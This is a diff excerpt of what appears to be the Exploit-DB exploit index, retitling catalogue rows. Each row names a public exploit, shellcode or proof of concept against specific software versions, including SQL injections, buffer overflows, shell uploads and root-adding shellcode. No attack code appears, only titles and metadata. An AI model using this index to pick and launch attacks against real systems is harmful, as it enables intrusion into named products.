10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BoF (Perl)",2009-12-29,jacky,windows,local,0
10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0
@ -10092,7 +10092,7 @@ id,file,description,date,author,platform,type,port
10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0
10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0
10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0
10936,platforms/windows/local/10936.c,"PlayMeNow Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0
10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0
10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0
10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0
@ -10158,7 +10158,7 @@ id,file,description,date,author,platform,type,port
11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - XSS Vulnerability",2010-01-06,POPCORN,hardware,webapps,0
11031,platforms/php/webapps/11031.txt,"Milonic News (viewnews) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0
11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) BoF PoC",2010-01-06,s4squatch,windows,dos,0
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - BoF PoC",2010-01-06,s4squatch,windows,dos,0
11035,platforms/php/webapps/11035.txt,"Joomla Component com_king Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0
11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0
11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0
@ -10937,7 +10937,7 @@ id,file,description,date,author,platform,type,port
11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload Vulnerability",2010-03-30,indoushka,php,webapps,0
11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0
11974,platforms/windows/remote/11974.py,"HP OpenView NNM OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0
11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0
11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0day)",2010-03-30,"Richard leahy",windows,dos,0
11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0
11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0
@ -11488,7 +11488,7 @@ id,file,description,date,author,platform,type,port
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
12587,platforms/linux/remote/12587.c,"wftpd server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
12588,platforms/linux/dos/12588.txt,"Samba - Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0
12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
@ -11698,7 +11698,7 @@ id,file,description,date,author,platform,type,port
12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0
12823,platforms/php/webapps/12823.txt,"musicbox SQL Injection",2010-05-31,titanichacker,php,webapps,0
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) Local SQL Injection Vulnerability",2010-05-31,"SA H4x0r",asp,webapps,0
12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0
12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0
12839,platforms/php/webapps/12839.txt,"Hexjector <= 1.0.7.2 - Persistent XSS",2010-06-01,hexon,php,webapps,0
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection Vulnerability",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret (SQL Injection)",2010-06-01,Neuromancer,asp,webapps,0
@ -11984,7 +11984,7 @@ id,file,description,date,author,platform,type,port
13503,platforms/unixware/shellcode/13503.txt,"Unixware execve /bin/sh 95 bytes",2004-09-26,K2,unixware,shellcode,0
13504,platforms/win32/shellcode/13504.asm,"Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs",2009-07-27,Skylined,win32,shellcode,0
13505,platforms/win32/shellcode/13505.c,"win32/xp sp2 (En) cmd.exe 23 bytes",2009-07-17,Stack,win32,shellcode,0
18615,platforms/windows/dos/18615.py,"TypesoftFTP Server 1.1 - Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0
18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0
18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
13507,platforms/win32/shellcode/13507.txt,"win32 SEH omelet shellcode 0.1",2009-03-16,Skylined,win32,shellcode,0
@ -12455,7 +12455,7 @@ id,file,description,date,author,platform,type,port
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross-Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0
14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection Vulnerability",2010-07-01,"Salvatore Fresta",php,webapps,0
14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0
14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0
14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 - Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0
14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0
14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0
14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0
@ -12492,7 +12492,7 @@ id,file,description,date,author,platform,type,port
14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI Vulnerability",2010-07-04,Sid3^effects,php,webapps,0
14203,platforms/php/webapps/14203.txt,"TCW PHP Album Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
@ -12675,8 +12675,8 @@ id,file,description,date,author,platform,type,port
14433,platforms/windows/local/14433.pl,"ZipCentral (.zip) Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0
14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0
14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0
14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script Remote Command Execution Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0
14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script Remote File inclusion Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0
14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script - Remote Command Execution Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0
14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script - Remote File inclusion Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0
14439,platforms/php/webapps/14439.txt,"phpBazar admin Information Disclosure Vulnerability",2010-07-22,Net_Spy,php,webapps,0
14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass Vulnerability)",2010-07-22,Silic0n,php,webapps,0
14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0
@ -12751,7 +12751,7 @@ id,file,description,date,author,platform,type,port
14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0
14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0
14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0
@ -12761,8 +12761,8 @@ id,file,description,date,author,platform,type,port
14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver _CreateDIBPalette()_ Buffer Overflow",2010-08-06,Arkon,windows,local,0
14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0
14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14552,platforms/windows/remote/14552.html,"FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14553,platforms/windows/remote/14553.html,"FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0
14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0
14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0
14555,platforms/windows/dos/14555.py,"Mediamonkey 3.2.1.1297 - DoS PoC",2010-08-05,anonymous,windows,dos,0
14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
@ -12796,7 +12796,7 @@ id,file,description,date,author,platform,type,port
14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0
14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0
14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0
14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0
14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0
14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0
14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0
14604,platforms/windows/remote/14604.py,"Easy FTP - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0
@ -12811,7 +12811,7 @@ id,file,description,date,author,platform,type,port
14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0
14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0
14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0
14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0
14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdiskyou,php,webapps,0
@ -12837,7 +12837,7 @@ id,file,description,date,author,platform,type,port
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0
14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) SQL Injection Vulnerability",2010-08-16,Forza-Dz,php,webapps,0
@ -13196,7 +13196,7 @@ id,file,description,date,author,platform,type,port
15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0
15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0
@ -13255,7 +13255,7 @@ id,file,description,date,author,platform,type,port
15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 and 2.02 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0
@ -13264,7 +13264,7 @@ id,file,description,date,author,platform,type,port
15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0
15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0
15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15607,platforms/php/webapps/15607.txt,"WSN Links SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0
15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0
15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0
15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0
15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0
@ -13369,7 +13369,7 @@ id,file,description,date,author,platform,type,port
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal Vulnerability",2010-10-31,"Yakir Wizman",windows,remote,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0
15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0
15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0
15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0
@ -13547,10 +13547,10 @@ id,file,description,date,author,platform,type,port
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0
15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0
15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0
15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0
15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0
15615,platforms/php/webapps/15615.html,"frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0
15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0
15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0
15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 - 51 bytes",2010-11-25,"Dustin Schultz",osx,shellcode,0
@ -13732,7 +13732,7 @@ id,file,description,date,author,platform,type,port
15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0
15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0
15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery - Remote File Inclusion Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15815,platforms/php/webapps/15815.txt,"Joomla Component com_adsmanager Remote File Inclusion Vulnerability",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 - SQL Injection Vulnerability",2010-12-23,Dr.NeT,php,webapps,0
15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0
@ -13770,7 +13770,7 @@ id,file,description,date,author,platform,type,port
15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0
15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
15858,platforms/php/webapps/15858.txt,"wordpress 3.0.3 - Stored XSS (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server (v 1.10) RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0
15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
@ -13787,7 +13787,7 @@ id,file,description,date,author,platform,type,port
15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0
15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0
15889,platforms/php/webapps/15889.txt,"Sahana Agasti <= 0.6.4 - SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0
15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0
15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 - SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0
15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0
@ -13898,7 +13898,7 @@ id,file,description,date,author,platform,type,port
16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition (game.php) SQL Injection Vulnerability",2011-01-26,"AtT4CKxT3rR0r1ST ",php,webapps,0
16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0
16049,platforms/php/webapps/16049.txt,"AWCM 2.2 final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0
16049,platforms/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0
16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0
16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0
16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0
@ -14514,7 +14514,7 @@ id,file,description,date,author,platform,type,port
16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0
